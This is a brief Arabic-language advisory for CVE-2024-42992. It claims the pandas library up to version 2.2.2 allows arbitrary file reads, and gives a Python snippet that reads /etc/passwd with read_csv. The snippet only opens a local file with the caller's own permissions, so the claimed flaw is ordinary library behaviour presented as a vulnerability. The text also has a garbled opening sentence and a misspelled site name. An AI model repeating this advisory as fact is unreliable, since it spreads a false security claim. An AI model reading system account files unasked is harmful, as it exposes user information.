
CVE-2024-42992
تم اكتشاف أن Python Pip Pandas v2.2.2 يحتوي على ملف تعسفي
Pip Pandas (جميع الإصدارات) - <=2.2.2
توجد ثغرة قراءة ملفات تعسفية في مكتبة "pandas"، ويمكن للمهاجم استغلالها لقراءة أي ملف في نظام الملفات دون قيود. تسمح هذه الثغرة بالوصول غير المصرح به إلى الملفات الحساسة مثل "/etc/passwd"
توفر مكتبة pandas قدرات قوية لمعالجة البيانات، بما في ذلك القدرة على قراءة البيانات من تنسيقات ملفات متنوعة. ومع ذلك، فإنها تفتقر إلى قيود كافية على مسارات الملفات المقدمة كمدخلات، مما يمكّن المستخدمين الخبيثين من تحديد وقراءة ملفات تعسفية. يمكن توضيح هذه الثغرة من خلال مقطع الكود التالي:
import pandas as pd
# Attempt to read the /etc/passwd file
try:
# Use pandas to read the file, specifying the colon as a separator
df = pd.read_csv('/etc/passwd', sep=':', header=None)
print(df)
except Exception as e:
print("Error occurred while reading the file:", e)
يحاول هذا الكود قراءة ملف "/etc/passwd"، وهو ملف مهم يحتوي على معلومات حسابات المستخدمين في الأنظمة المبنية على Unix. إذا تم تنفيذ الكود بنجاح، فسيقوم بطباعة محتويات هذا الملف الحساس.
في بعض سيناريوهات الوصول عبر الإنترنت أو محليًا، يمكن إعادة إنتاج هذا بنجاح. وفي بعض البيئات عبر الإنترنت مثل replyt.com، يكون قابلاً لإعادة الإنتاج بشكل خاص.
python CVE-2024-42992.py
